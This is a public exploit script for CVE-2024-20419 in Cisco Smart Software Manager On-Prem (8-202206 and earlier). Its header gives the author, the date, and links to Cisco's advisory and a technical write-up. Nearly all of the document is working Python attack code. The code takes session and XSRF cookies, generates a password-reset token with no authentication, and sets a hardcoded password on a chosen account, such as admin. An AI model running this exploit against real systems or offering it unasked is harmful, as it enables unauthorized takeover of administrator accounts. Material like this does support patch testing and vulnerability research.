# Exploit Title: Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover # Google Dork: N/A # Date: 21/07/2024 # Exploit Author: Mohammed Adel # Vendor Homepage: https://www.cisco.com # Software Link: https://www.cisco.com/c/en/us/products/collateral/cloud-systems-management/smart-software-manager-satellite/datasheet-c78-734539.html # Version: 8-202206 and earlier # Tested on: Kali Linux # CVE : CVE-2024-20419 # Security Advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy # Technical Analysis: https://www.0xpolar.com/blog/CVE-2024-20419 import requests, sys from urllib.parse import unquote # Suppress SSL warnings requests.packages.urllib3.disable_warnings() Domain = sys.argv[1] # Domain, https://0xpolar.com:8443 Username = sys.argv[2] # Username, by default its [admin] password = "Polar@123456780" print("[*] Cisco Smart Software Manager On-Prem") print("[*] Account Takeover Exploit") print("[*] Target: "+Domain) print("[*] Username: "+Username) print("\n") print("[*] Getting Necessary Tokens..") get_url = Domain+"/backend/settings/oauth_adfs?hostname=polar" response = requests.get(get_url, verify=False) def get_cookie_value(headers, cookie_name): cookies = headers.get('Set-Cookie', '').split(',') for cookie in cookies: if cookie_name in cookie: parts = cookie.split(';') for part in parts: if cookie_name in part: return part.split('=')[1].strip() return None set_cookie_headers = response.headers.get('Set-Cookie', '') xsrf_token = get_cookie_value(response.headers, 'XSRF-TOKEN') lic_engine_session = get_cookie_value(response.headers, '_lic_engine_session') if xsrf_token: xsrf_token = unquote(xsrf_token) if not lic_engine_session or not xsrf_token: print("Required cookies not found in the response.") else: print("[+] lic_engine_session: "+lic_engine_session) print("[+] xsrf_token: "+xsrf_token) print("\n[*] Generating Auth Token") post_url = Domain+"/backend/reset_password/generate_code" headers = { 'Accept': 'application/json', 'Content-Type': 'application/json', 'X-Xsrf-Token': xsrf_token, 'Sec-Ch-Ua': '', 'Sec-Ch-Ua-Mobile': '?0', } cookies = { '_lic_engine_session': lic_engine_session, 'XSRF-TOKEN': xsrf_token, } payload = { 'uid': Username } post_response = requests.post(post_url, headers=headers, cookies=cookies, json=payload, verify=False) post_response_json = post_response.json() auth_token = post_response_json.get('auth_token') if not auth_token: print("auth_token not found in the response.") else: print("[+] Auth Token: "+auth_token) print("\n[*] Setting Up a New Password") final_post_url = Domain+"/backend/reset_password" final_headers = { 'Accept': 'application/json', 'Content-Type': 'application/json', 'X-Xsrf-Token': xsrf_token, } final_cookies = { '_lic_engine_session': lic_engine_session, 'XSRF-TOKEN': xsrf_token, } final_payload = { 'uid': Username, 'auth_token': auth_token, 'password': password, 'password_confirmation': password, 'common_name': '' } final_post_response = requests.post(final_post_url, headers=final_headers, cookies=final_cookies, json=final_payload, verify=False) response_text = final_post_response.text if "OK" in response_text: print("[+] Password Successfully Changed!") print("[+] Username: "+Username) print("[+] New Password: "+password) else: print("[!] Something Went Wrong") print(response_text)